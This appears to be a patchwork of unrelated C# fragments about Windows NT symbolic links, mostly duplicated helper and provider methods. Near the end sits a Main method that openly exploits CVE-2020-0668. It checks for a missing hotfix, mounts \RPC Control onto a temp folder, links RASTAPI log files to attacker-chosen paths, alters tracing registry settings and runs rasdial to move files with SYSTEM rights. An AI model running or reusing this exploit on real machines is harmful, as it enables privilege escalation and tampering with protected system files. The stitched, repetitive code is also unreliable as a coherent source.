/// <summary>
/// Method to create an object from a set of object attributes.
/// </summary>
/// <param name="obj_attributes">The object attributes to create/open from.</param>
/// <returns>The newly created object.</returns>
protected override object CreateObject(ObjectAttributes obj_attributes)
{
using (NtSymbolicLink link = NtSymbolicLink.Open(obj_attributes, SymbolicLinkAccessRights.Query))
{
return(link.Target);
}
}
private void PopulateData()
{
if (!_data_populated)
{
_data_populated = true;
if (NtObject.CanOpenType(TypeName))
{
try
{
using (NtObject obj = ToObject())
{
if (obj.IsAccessMaskGranted(GenericAccessRights.ReadControl))
{
_sd = obj.SecurityDescriptor;
}
NtSymbolicLink link = obj as NtSymbolicLink;
if (link != null && link.IsAccessGranted(SymbolicLinkAccessRights.Query))
{
_symlink_target = link.Target;
}
_maximum_granted_access = obj.GrantedAccessMask.ToSpecificAccess(obj.NtType.AccessRightsType);
}
}
catch
{
}
}
}
}
public static string ReadSymlink(string symlink_path)
{
using (NtSymbolicLink symlink = NtSymbolicLink.Open(symlink_path, null, SymbolicLinkAccessRights.Query))
{
return(symlink.Target);
}
}
private string MapWin32ToDevicePath()
{
string path = NtFileUtils.DosFileNameToNt(SymbolicLinkPath);
string final_component = string.Empty;
// Strip off any remaining path.
if (path.StartsWith(@"\??\"))
{
int slash_index = path.IndexOf('\\', 4);
if (slash_index >= 0)
{
final_component = path.Substring(slash_index);
path = path.Substring(0, slash_index);
}
}
using (var link = NtSymbolicLink.Open(path, null, SymbolicLinkAccessRights.Query, false))
{
if (link.IsSuccess)
{
path = link.Result.Target;
}
}
return(path + final_component);
}
public override NtObject NewItem(string relative_path, string item_type_name, object new_item_value)
{
switch (item_type_name.ToLower())
{
case "event":
return(NtEvent.Create(relative_path, _dir, EventType.NotificationEvent, false));
case "directory":
return(NtDirectory.Create(relative_path, _dir, DirectoryAccessRights.MaximumAllowed));
case "symboliclink":
case "link":
if (new_item_value == null)
{
throw new ArgumentNullException(nameof(new_item_value), "Must specify value for the symbolic link");
}
return(NtSymbolicLink.Create(relative_path, _dir, new_item_value.ToString()));
case "mutant":
return(NtMutant.Create(relative_path, _dir, false));
case "semaphore":
int max_count = 1;
if (new_item_value != null)
{
max_count = Convert.ToInt32(new_item_value);
}
return(NtSemaphore.Create(relative_path, _dir, 0, max_count));
default:
throw new ArgumentException($"Can't create new object of type {item_type_name}");
}
}
private NtResult <NtSymbolicLink> CreateSymlink(int session_id, string name, bool throw_on_error)
{
using (var obja = CreateObjectAttributes(session_id, name)) {
return(NtSymbolicLink.Create(obja, SymbolicLinkAccessRights.MaximumAllowed,
GetSessionString(_session_id, name), throw_on_error));
}
}
/// <summary>
/// Method to create an object from a set of object attributes.
/// </summary>
/// <param name="obj_attributes">The object attributes to create/open from.</param>
/// <returns>The newly created object.</returns>
protected override object CreateObject(ObjectAttributes obj_attributes)
{
if (TargetPath == null)
{
throw new ArgumentNullException("TargetPath");
}
return(NtSymbolicLink.Create(obj_attributes, Access, TargetPath));
}
/// <summary>
/// Overridden method to create a new item.
/// </summary>
/// <param name="path">The drive path to create.</param>
/// <param name="itemTypeName">The NT object type to create.</param>
/// <param name="newItemValue">Additional item value data.</param>
protected override void NewItem(string path, string itemTypeName, object newItemValue)
{
if (itemTypeName == null)
{
throw new ArgumentNullException("itemTypeName", "Must specify a typename");
}
NtObject obj = null;
string relative_path = GetRelativePath(PSPathToNT(path));
bool container = false;
switch (itemTypeName.ToLower())
{
case "event":
obj = NtEvent.Create(relative_path, GetDrive().DirectoryRoot, EventType.NotificationEvent, false);
break;
case "directory":
obj = NtDirectory.Create(relative_path, GetDrive().DirectoryRoot, DirectoryAccessRights.MaximumAllowed);
container = true;
break;
case "symboliclink":
case "link":
if (newItemValue == null)
{
throw new ArgumentNullException("newItemValue", "Must specify value for the symbolic link");
}
obj = NtSymbolicLink.Create(relative_path, GetDrive().DirectoryRoot, newItemValue.ToString());
break;
case "mutant":
obj = NtMutant.Create(relative_path, GetDrive().DirectoryRoot, false);
break;
case "semaphore":
int max_count = 1;
if (newItemValue != null)
{
max_count = Convert.ToInt32(newItemValue);
}
obj = NtSemaphore.Create(relative_path, GetDrive().DirectoryRoot, 0, max_count);
break;
default:
throw new ArgumentException(String.Format("Can't create new object of type {0}", itemTypeName));
}
WriteItemObject(obj, path, container);
}
public static string ReadSymlink(string symlink_path)
{
try
{
using (NtSymbolicLink symlink = NtSymbolicLink.Open(symlink_path, null, SymbolicLinkAccessRights.Query))
{
return(symlink.Target);
}
}
catch (NtException ex)
{
throw ex.AsWin32Exception();
}
}
static string GetSymlinkTarget(ObjectDirectoryEntry entry)
{
try
{
using (NtSymbolicLink link = NtSymbolicLink.Open(entry.FullPath, null))
{
return(link.Target);
}
}
catch (NtException)
{
return("");
}
}
/// <summary>
/// Method to create an object from a set of object attributes.
/// </summary>
/// <param name="obj_attributes">The object attributes to create/open from.</param>
/// <returns>The newly created object.</returns>
protected override object CreateObject(ObjectAttributes obj_attributes)
{
if (TargetPath == null)
{
throw new ArgumentNullException("TargetPath");
}
if (Global)
{
using (var link = NtSymbolicLink.Create(obj_attributes, Access | SymbolicLinkAccessRights.Set, TargetPath))
{
link.SetGlobalLink();
return(link.Duplicate());
}
}
return(NtSymbolicLink.Create(obj_attributes, Access, TargetPath));
}
/// <summary>
/// Method to create an object from a set of object attributes.
/// </summary>
/// <param name="obj_attributes">The object attributes to create/open from.</param>
/// <returns>The newly created object.</returns>
protected override object CreateObject(ObjectAttributes obj_attributes)
{
return(NtSymbolicLink.Open(obj_attributes, Access));
}
static void Main(string[] args)
{
if (args.Length != 2)
{
Console.WriteLine("Use CVE-2020-0668 to perform an arbitrary privileged file move operation.");
Console.WriteLine($"Usage: inFilePath outFilePath");
return;
}
String inDLLPath = args[0];
String outDllPath = args[1];
if (!File.Exists(inDLLPath))
{
Console.WriteLine($@"[!] Cannot find {inDLLPath}!");
return;
}
Console.WriteLine(String.Format("[+] Moving {0} to {1}", inDLLPath, outDllPath));
bool checkVuln = isVulnerable();
if (!checkVuln)
{
Console.WriteLine("[-] NOT VULNERABLE: Hotfix KB4532693 Found");
return;
}
else
{
Console.WriteLine("[+] VULNERABLE: Hotfix KB4532693 Not Found");
}
String tempDirectory = GetTemporaryDirectory();
const string ObjectDirectory = @"\RPC Control";
Console.WriteLine($@"[+] Mounting {ObjectDirectory} onto {tempDirectory}");
string tempDirectoryNt = NtFileUtils.DosFileNameToNt(tempDirectory);
NtFile.CreateMountPoint(tempDirectoryNt, ObjectDirectory, "");
Console.WriteLine("[+] Creating symbol links");
var logFileSymlnk = NtSymbolicLink.Create($@"{ObjectDirectory}\RASTAPI.LOG", $@"\??\{inDLLPath}");
var oldFileSymlnk = NtSymbolicLink.Create($@"{ObjectDirectory}\RASTAPI.OLD", $@"\??\{outDllPath}");
Console.WriteLine(@"[+] Updating the HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\RASPLAP configuration.");
Console.WriteLine(@"[+] Sleeping for 5 seconds so the changes take effect");
UpdateRASTAPITracingConfig(tempDirectory, true, 0x1000);
Thread.Sleep(5000); // might have to sleep for the update to take effect
string phonebookPath = Path.Combine(Path.GetTempPath(), Guid.NewGuid().ToString() + ".pbk");
Console.WriteLine($"[+] Writing phonebook file to {phonebookPath}");
File.WriteAllText(phonebookPath, CVE_2020_0668.Properties.Resources.Phonebook);
using (Process p = new Process())
{
p.StartInfo.FileName = "rasdial";
p.StartInfo.Arguments = $@"VPNTEST test test /PHONEBOOK:{phonebookPath}";
p.StartInfo.CreateNoWindow = true;
p.StartInfo.UseShellExecute = false;
p.Start();
p.WaitForExit();
}
Console.WriteLine("[+] Cleaning up");
File.Delete(phonebookPath);
Directory.Delete(tempDirectory, true);
logFileSymlnk.Close();
oldFileSymlnk.Close();
UpdateRASTAPITracingConfig(@"%windir%\tracing", false, 0x100000); //those are the default values
Console.WriteLine("[+] Done!");
}
protected override sealed NtResult <NtSymbolicLink> OpenInternal(ObjectAttributes obj_attributes,
SymbolicLinkAccessRights desired_access, bool throw_on_error)
{
return(NtSymbolicLink.Open(obj_attributes, desired_access, throw_on_error));
}
